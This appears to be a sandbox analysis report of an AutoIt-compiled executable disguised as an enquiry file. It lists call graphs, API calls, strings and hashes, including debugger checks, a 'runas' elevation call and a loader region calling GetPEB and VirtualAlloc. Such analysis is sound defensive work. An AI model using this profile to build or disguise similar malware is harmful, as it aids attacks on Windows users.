109633 c8c594 GetLastError 109630->109633 109640 c8c1c3 109630->109640 109635 c8c30d 109631->109635 109642 c8c22c 109631->109642 109632->109609 109633->109640 109636 c8bf03 GetConsoleMode 109634->109636 109645 c8c416 109635->109645 109648 c8c318 109635->109648 109636->109627 109638 c8bf3c 109636->109638 109637 c8c5ce 109637->109609 109639 c8889e __mbsnbicoll_l 47 API calls 109637->109639 109638->109627 109641 c8bf4c GetConsoleCP 109638->109641 109646 c8c5f6 109639->109646 109640->109609 109640->109637 109647 c8c5aa 109640->109647 109641->109640 109669 c8bf75 109641->109669 109642->109637 109643 c8c29c WriteFile 109642->109643 109643->109633 109644 c8c2d9 109643->109644 109644->109640 109644->109642 109654 c8c308 109644->109654 109645->109637 109649 c8c48b WideCharToMultiByte 109645->109649 109650 c8886a __set_osfhnd 47 API calls 109646->109650 109651 c8c5b1 109647->109651 109652 c8c5c5 109647->109652 109648->109637 109653 c8c391 WriteFile 109648->109653 109649->109633 109663 c8c4d2 109649->109663 109650->109609 109655 c8889e __mbsnbicoll_l 47 API calls 109651->109655 109656 c8887d __dosmaperr 47 API calls 109652->109656 109653->109633 109657 c8c3e0 109653->109657 109654->109640 109659 c8c5b6 109655->109659 109656->109609 109657->109640 109657->109648 109657->109654 109658 c8c4da WriteFile 109661 c8c52d GetLastError 109658->109661 109658->109663 109662 c8886a __set_osfhnd 47 API calls 109659->109662 109660 c822a8 __chsize_nolock 57 API calls 109660->109669 109661->109663 109662->109609 109663->109640 109663->109645 109663->109654 109663->109658 109664 c96634 WriteConsoleW CreateFileW __chsize_nolock 109667 c8c0a9 109664->109667 109665 c94ea7 59 API calls __chsize_nolock 109665->109669 109666 c8c042 WideCharToMultiByte 109666->109640 109668 c8c07d WriteFile 109666->109668 109667->109633 109667->109640 109667->109664 109667->109669 109670 c8c0d4 WriteFile 109667->109670 109668->109633 109668->109667 109669->109640 109669->109660 109669->109665 109669->109666 
109669->109667 109670->109633 109670->109667 109671->109579 109672->109584 109673->109594 109674->109595 109675->109584 109676->109583 109677->109588 109678->109584 109679->109545 109680->109547 109703 c8b957 109681->109703 109683 c8f85a 109684 c8f8b0 109683->109684 109686 c8f88e 109683->109686 109689 c8b957 __lseeki64_nolock 47 API calls 109683->109689 109716 c8b8d1 48 API calls 2 library calls 109684->109716 109686->109684 109687 c8b957 __lseeki64_nolock 47 API calls 109686->109687 109691 c8f89a CloseHandle 109687->109691 109688 c8f8b8 109692 c8f8da 109688->109692 109717 c8887d 47 API calls 3 library calls 109688->109717 109690 c8f885 109689->109690 109693 c8b957 __lseeki64_nolock 47 API calls 109690->109693 109691->109684 109694 c8f8a6 GetLastError 109691->109694 109692->109569 109693->109686 109694->109684 109696->109554 109697->109568 109698->109569 109699->109568 109700->109557 109701->109561 109702->109568 109704 c8b962 109703->109704 109705 c8b977 109703->109705 109706 c8886a __set_osfhnd 47 API calls 109704->109706 109708 c8886a __set_osfhnd 47 API calls 109705->109708 109710 c8b99c 109705->109710 109707 c8b967 109706->109707 109709 c8889e __mbsnbicoll_l 47 API calls 109707->109709 109711 c8b9a6 109708->109711 109714 c8b96f 109709->109714 109710->109683 109712 c8889e __mbsnbicoll_l 47 API calls 109711->109712 109713 c8b9ae 109712->109713 109715 c87aa0 __mbsnbicoll_l 8 API calls 109713->109715 109714->109683 109715->109714 109716->109688 109717->109692 109718->109158 109719->109161 109720->109165 109721->109171 109722->109179 109723->109181 109724->109177 109725->109185 109726->109189 109727->109205 109728->109201 109730 c631c7 109729->109730 109731 cd4aa5 GetFullPathNameW 109729->109731 109786 c63bcf 109730->109786 109734 cd4abd 109731->109734 109733 c631cd GetFullPathNameW 109735 c631e7 109733->109735 109734->109734 109735->109022 109737 c63a8b SHGetDesktopFolder 109736->109737 109740 c63ade 109736->109740 109738 c63a99 109737->109738 109737->109740 
Call-graph edge list for the subroutines in the 00C6xxxx to 00CDxxxx range of the main module and the 0339xxxx region (interactive graph data; the rendered graph is not reproduced in text). Windows API calls reached from the main-module nodes: SHGetPathFromIDListW, LoadImageW, EnumResourceNamesW, RegisterClassExW, GetSysColorBrush, RegisterWindowMessageW, ImageList_Create, LoadIconW, ImageList_ReplaceIcon, GetFileAttributesW, FindFirstFileW, FindClose, GetTempPathW, GetTempFileNameW, CopyFileW, DeleteFileW, CreateFileW, SetFileTime, CloseHandle, GetSystemTimeAsFileTime, LeaveCriticalSection, CharLowerBuffW, CharUpperBuffW, GetCurrentProcess, TerminateProcess, FreeLibrary, VirtualAlloc, InterlockedDecrement. The 0339xxxx nodes (starting at 033923B0) reach GetPEB, Sleep, CreateFileW, VirtualAlloc, ReadFile and ExitProcess.

                                Control-flow Graph

                                • Executed
                                • Not Executed
Control-flow graph of the function at 00C8BDF6 (interactive graph data; the rendered graph is not reproduced in text). Basic blocks in this function call GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile and GetLastError.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7204df483693e098024a66dfbda819454e35793b246f8e6978d58ccd8c05f49d
                                • Instruction ID: ceb72438cc1fec19cedeb78e8ef3484829b1edfa40ee169a46be1e79ff26766d
                                • Opcode Fuzzy Hash: 7204df483693e098024a66dfbda819454e35793b246f8e6978d58ccd8c05f49d
                                • Instruction Fuzzy Hash: A8327D75B022288FDB24DF14DC84AE9B7B5FB46314F4840D9E41AE7A81D730AE81DF66

                                Control-flow Graph

                                APIs
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C6376D
                                  • Part of subcall function 00C64257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 00C6428C
                                • IsDebuggerPresent.KERNEL32(?,?), ref: 00C6377F
                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00D21120,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00D21124,?,?), ref: 00C637EE
                                  • Part of subcall function 00C634F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C6352A
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C63860
                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00D12934,00000010), ref: 00CD21C5
                                • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00CD21FD
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00CD2232
                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CFDAA4), ref: 00CD2290
                                • ShellExecuteW.SHELL32(00000000), ref: 00CD2297
                                  • Part of subcall function 00C630A5: GetSysColorBrush.USER32(0000000F), ref: 00C630B0
                                  • Part of subcall function 00C630A5: LoadCursorW.USER32(00000000,00007F00), ref: 00C630BF
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(00000063), ref: 00C630D5
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(000000A4), ref: 00C630E7
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(000000A2), ref: 00C630F9
                                  • Part of subcall function 00C630A5: RegisterClassExW.USER32(?), ref: 00C63167
                                  • Part of subcall function 00C62E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C62ECB
                                  • Part of subcall function 00C62E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C62EEC
                                  • Part of subcall function 00C62E9D: ShowWindow.USER32(00000000), ref: 00C62F00
                                  • Part of subcall function 00C62E9D: ShowWindow.USER32(00000000), ref: 00C62F09
                                  • Part of subcall function 00C63598: _memset.LIBCMT ref: 00C635BE
                                  • Part of subcall function 00C63598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C63667
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                • String ID: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                • API String ID: 4253510256-1030974485
                                • Opcode ID: 14dbf3360931e6082d69ec46e51e07d62a472fb80c05521715a9a86d86d51f8c
                                • Instruction ID: 8e48930918d5429e0dbba726664d0ac1c5bb037fed95d03d5649ff47da232125
                                • Opcode Fuzzy Hash: 14dbf3360931e6082d69ec46e51e07d62a472fb80c05521715a9a86d86d51f8c
                                • Instruction Fuzzy Hash: E3511779644394BECB31ABA0ACC6BFD3B789B39714F004056F652962E1CA714B46DB32

                                Control-flow Graph

                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 00C7E4A7
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • GetCurrentProcess.KERNEL32(00000000,00CFDC28,?,?), ref: 00C7E567
                                • GetNativeSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5BC
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7E5C7
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7E5DA
                                • GetSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5E4
                                • GetSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                • String ID:
                                • API String ID: 2717633055-0
                                • Opcode ID: 2c90cf2506bdbe77a17d9c5daefedbd060c57142ad71645cf0b4c0006b8d49b4
                                • Instruction ID: b36e877c84de3c88676590cdb457b446b9c777a9287396961d5596b7a9c79d2d
                                • Opcode Fuzzy Hash: 2c90cf2506bdbe77a17d9c5daefedbd060c57142ad71645cf0b4c0006b8d49b4
                                • Instruction Fuzzy Hash: BC61AFB28092C8CBCF55CF6898C11ED7FA4AF3A304F1985D9D8599F30BD624CA48DB65

                                Control-flow Graph

                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C63202
                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00C63219
                                • LoadResource.KERNEL32(?,00000000), ref: 00CD57D7
                                • SizeofResource.KERNEL32(?,00000000), ref: 00CD57EC
                                • LockResource.KERNEL32(?), ref: 00CD57FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                • String ID: SCRIPT
                                • API String ID: 3051347437-3967369404
                                • Opcode ID: 86ed9f753546d1f83db1e0b37190b25a0aa50962d6fd7425fb9cff5a13cd7e07
                                • Instruction ID: d0353e25604bef8ddb06b4f83ad924b67c341dfb2b737b4dfe7c6b377ae081e3
                                • Opcode Fuzzy Hash: 86ed9f753546d1f83db1e0b37190b25a0aa50962d6fd7425fb9cff5a13cd7e07
                                • Instruction Fuzzy Hash: 38118B71204741BFE7218B65EC88F2B7BB9EBC9B41F208029F5128A290DB71DE10CA70
                                APIs
                                • GetFileAttributesW.KERNEL32(00C6C848,00C6C848), ref: 00C7DDA2
                                • FindFirstFileW.KERNEL32(00C6C848,?), ref: 00CD4A83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$AttributesFindFirst
                                • String ID:
                                • API String ID: 4185537391-0
                                • Opcode ID: 4987786a9f1f6eabdcb90d2ce58c6639ab95e018b144e43cfcd31094f7ad3dda
                                • Instruction ID: 46486e86c21ec72dcddef5d4d51451e2bd3fc19cefce605290cd314e27bf399c
                                • Opcode Fuzzy Hash: 4987786a9f1f6eabdcb90d2ce58c6639ab95e018b144e43cfcd31094f7ad3dda
                                • Instruction Fuzzy Hash: 71E0D8314145415B42246738DC4E9ED376C9F05338F100705F93BC11E0E770AE4495E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID:
                                • API String ID: 3964851224-0
                                • Opcode ID: c938ff3d85762ca7240c8f03c1d5500848fa8bd351cd4550ddd3d840254f1b90
                                • Instruction ID: 260c823e077426216b5a680537cb17d29ec92af6fe8bdad499c6b35c92a7321c
                                • Opcode Fuzzy Hash: c938ff3d85762ca7240c8f03c1d5500848fa8bd351cd4550ddd3d840254f1b90
                                • Instruction Fuzzy Hash: C1926870608341DFD724DF29C484B6ABBE1BF88304F14885DE99A8B3A2D771EE45DB52
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C6E279
                                • timeGetTime.WINMM ref: 00C6E51A
                                • TranslateMessage.USER32(?), ref: 00C6E646
                                • DispatchMessageW.USER32(?), ref: 00C6E651
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C6E664
                                • LockWindowUpdate.USER32(00000000), ref: 00C6E697
                                • DestroyWindow.USER32 ref: 00C6E6A3
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C6E6BD
                                • Sleep.KERNEL32(0000000A), ref: 00CD5B15
                                • TranslateMessage.USER32(?), ref: 00CD62AF
                                • DispatchMessageW.USER32(?), ref: 00CD62BD
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CD62D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                • API String ID: 2641332412-570651680
                                • Opcode ID: 9041a60abc6634c49e0ad0f19cda801b944792e2a8a15089733a866ba44336ec
                                • Instruction ID: 16457b4c02f82d755b953ccd3445c47b8e74cb62c02658ee9e122868f6d4f9bb
                                • Opcode Fuzzy Hash: 9041a60abc6634c49e0ad0f19cda801b944792e2a8a15089733a866ba44336ec
                                • Instruction Fuzzy Hash: B662DE745083409FDB30DF64C8C5BAA77E4AF54304F18496EF95A8B3A2DB70E948DB62
                                APIs
                                • ___createFile.LIBCMT ref: 00C96C73
                                • ___createFile.LIBCMT ref: 00C96CB4
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C96CDD
                                • __dosmaperr.LIBCMT ref: 00C96CE4
                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C96CF7
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C96D1A
                                • __dosmaperr.LIBCMT ref: 00C96D23
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C96D2C
                                • __set_osfhnd.LIBCMT ref: 00C96D5C
                                • __lseeki64_nolock.LIBCMT ref: 00C96DC6
                                • __close_nolock.LIBCMT ref: 00C96DEC
                                • __chsize_nolock.LIBCMT ref: 00C96E1C
                                • __lseeki64_nolock.LIBCMT ref: 00C96E2E
                                • __lseeki64_nolock.LIBCMT ref: 00C96F26
                                • __lseeki64_nolock.LIBCMT ref: 00C96F3B
                                • __close_nolock.LIBCMT ref: 00C96F9B
                                  • Part of subcall function 00C8F84C: CloseHandle.KERNEL32(00000000,00D0EEC4,00000000,?,00C96DF1,00D0EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C8F89C
                                  • Part of subcall function 00C8F84C: GetLastError.KERNEL32(?,00C96DF1,00D0EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C8F8A6
                                  • Part of subcall function 00C8F84C: __free_osfhnd.LIBCMT ref: 00C8F8B3
                                  • Part of subcall function 00C8F84C: __dosmaperr.LIBCMT ref: 00C8F8D5
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __lseeki64_nolock.LIBCMT ref: 00C96FBD
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C970F2
                                • ___createFile.LIBCMT ref: 00C97111
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C9711E
                                • __dosmaperr.LIBCMT ref: 00C97125
                                • __free_osfhnd.LIBCMT ref: 00C97145
                                • __invoke_watson.LIBCMT ref: 00C97173
                                • __wsopen_helper.LIBCMT ref: 00C9718D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                • String ID: @
                                • API String ID: 3896587723-2766056989
                                • Opcode ID: 2c95f5f5d6b8102d4bf97baac29f3627725a4b3cf74c983808add19001e54dae
                                • Instruction ID: e599a8494aaf0b4b59ef52f0504dc4fd2f95c0af58b152156f146d954d17932f
                                • Opcode Fuzzy Hash: 2c95f5f5d6b8102d4bf97baac29f3627725a4b3cf74c983808add19001e54dae
                                • Instruction Fuzzy Hash: A42215719042059FEF259F68DC99BBE7B61EF00324F284229E531EB2E2D7358E50EB51

                                Control-flow Graph

                                APIs
                                • _wcscpy.LIBCMT ref: 00CB026A
                                • _wcschr.LIBCMT ref: 00CB0278
                                • _wcscpy.LIBCMT ref: 00CB028F
                                • _wcscat.LIBCMT ref: 00CB029E
                                • _wcscat.LIBCMT ref: 00CB02BC
                                • _wcscpy.LIBCMT ref: 00CB02DD
                                • __wsplitpath.LIBCMT ref: 00CB03BA
                                • _wcscpy.LIBCMT ref: 00CB03DF
                                • _wcscpy.LIBCMT ref: 00CB03F1
                                • _wcscpy.LIBCMT ref: 00CB0406
                                • _wcscat.LIBCMT ref: 00CB041B
                                • _wcscat.LIBCMT ref: 00CB042D
                                • _wcscat.LIBCMT ref: 00CB0442
                                  • Part of subcall function 00CAC890: _wcscmp.LIBCMT ref: 00CAC92A
                                  • Part of subcall function 00CAC890: __wsplitpath.LIBCMT ref: 00CAC96F
                                  • Part of subcall function 00CAC890: _wcscpy.LIBCMT ref: 00CAC982
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC995
                                  • Part of subcall function 00CAC890: __wsplitpath.LIBCMT ref: 00CAC9BA
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC9D0
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC9E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                • String ID: >>>AUTOIT SCRIPT<<<
                                • API String ID: 2955681530-2806939583
                                • Opcode ID: f3e707e5d3b6866910f2668900d8b34e59a15aeb9622ddd443975d5904465993
                                • Instruction ID: d252f2d2ce5ccbc86c3e2e1563af519bfded81269bc6ccd4c052934a90f93436
                                • Opcode Fuzzy Hash: f3e707e5d3b6866910f2668900d8b34e59a15aeb9622ddd443975d5904465993
                                • Instruction Fuzzy Hash: B591D271104705AFCB20EB54C895FEBB3E8AF84314F04495DF9599B2A1EF34EA48DB92

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00C62F8B
                                • RegisterClassExW.USER32(00000030), ref: 00C62FB5
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62FC6
                                • InitCommonControlsEx.COMCTL32(?), ref: 00C62FE3
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C62FF3
                                • LoadIconW.USER32(000000A9), ref: 00C63009
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63018
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3To
                                • API String ID: 2914291525-26617492
                                • Opcode ID: 518f13b98c5c3517aa026e33189848c2a71e8184b4b542ec09962579631270e9
                                • Instruction ID: c00e86a545cb349264a71842de82385eb08a428a6e48072642003a9c38f9f35e
                                • Opcode Fuzzy Hash: 518f13b98c5c3517aa026e33189848c2a71e8184b4b542ec09962579631270e9
                                • Instruction Fuzzy Hash: 252194B9900358AFDB509F94E889BCDBBB4FB28700F10811AF615EA2A0D7B54545CFA5

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 00C6428C
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00C81BC7: __wcsicmp_l.LIBCMT ref: 00C81C50
                                • _wcscpy.LIBCMT ref: 00C643C0
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00CD214E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe$CMDLINE$CMDLINERAW
                                • API String ID: 861526374-2296291692
                                • Opcode ID: ef6a8ca6bcc188487fb04c071e19bbd2e38322170f688dcba3d125083251df93
